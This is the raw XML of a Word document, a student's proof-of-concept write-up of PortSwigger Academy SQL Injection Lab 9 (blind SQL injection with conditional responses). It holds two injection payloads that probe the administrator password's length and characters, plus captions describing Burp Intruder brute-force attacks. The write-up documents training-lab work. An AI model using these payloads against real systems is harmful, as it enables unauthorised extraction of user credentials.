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C0392B" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="-1440" w:right="-1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy — Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="566573"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab 9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL injection with conditional responses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22B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Category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SQL Injection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22B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Lab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Lab 9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22B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Completed By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Security Researcher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22B21"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Platform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PortSwigger Web Security Academy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Objective</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="F39C12" w:sz="12"/>
        </w:pBdr>
        <w:shd w:fill="FEF9E7" w:val="clear"/>
        <w:spacing w:after="200" w:before="0"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit blind SQL injection with conditional responses to extract the administrator password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Exploitation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and (select username from users where username='administrator' and LENGTH(password)&gt;1)='administrator'--'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and (select substring(password,1,1)from users where username='administrator')='a'--'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshots &amp; Evidence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i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1: Brute Force Az09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i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2: Check The Blink Sql Is Possible Checking Quarry With Welcome Message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i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3: Check The Tracking ID Request For Bliend SQL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i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 4: Find The Length With This Paylaod Sql Injection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i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: In Cluster Bomb Attack 2 '$' 1st$ Is For Number Valuse Upto 20 And 2nd For Bruteforce Az09</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="27AE60" w:sz="12"/>
        </w:pBdr>
        <w:shd w:fill="EAFAF1" w:val="clear"/>
        <w:spacing w:after="80" w:before="200"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Solved — Confirmation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i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 6: Lab Solved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i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 7: This Paylaod Use For Findind The Passwod Using Cluster Bomb Attack And Paylaod Sql Injection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i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 8: You Got This By Using Sniping Number List Attack 1 To 100 Andwhere The Length Change Measn Welcome Message Not Appers Only Same Length Of Starting Number Will Same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i/>
          <w:iCs/>
          <w:color w:val="566573"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 9: You Got This Responce And Arrange Thsi You Got Your Passwod</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="27AE60" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="EAFAF1" w:val="clear"/>
        <w:spacing w:after="80" w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="27AE60"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Status: SOLVED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922B21" w:sz="4"/>
      </w:pBdr>
      <w:spacing w:before="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Blind SQL injection with conditional responses  |  Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="56657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0392B" w:sz="4"/>
      </w:pBdr>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="566573"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">PortSwigger Academy PoC  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C0392B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">SQL Injection — Lab 9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color w:val="C0392B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180"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C0392B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ff241b721dd96187322ef656bb65c4d49ba7a99b.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0fea79d4609505df17701992b73f29954a544455.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/3640514f6964bebbb0b76cbe31c9e2351e09b492.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/8e093343ec9fab9bdd8deb74601515e092e62684.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0721bda263ed3b46ef9be1ef139ca8ef250372c7.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5c58e5f8ccf93394a8451f09e5ad6b48713a48bb.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7caf985d41eed4df3814be32b831020ab4bff25b.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/04825c6bd86ff4021e555152d005f5f42feabba8.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/f04e095d3a9d7d5356e63f233e5fad222d3ab0e8.png"/><Relationship Id="rId1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2026-05-24T12:08:39.034Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-24T12:08:39.034Z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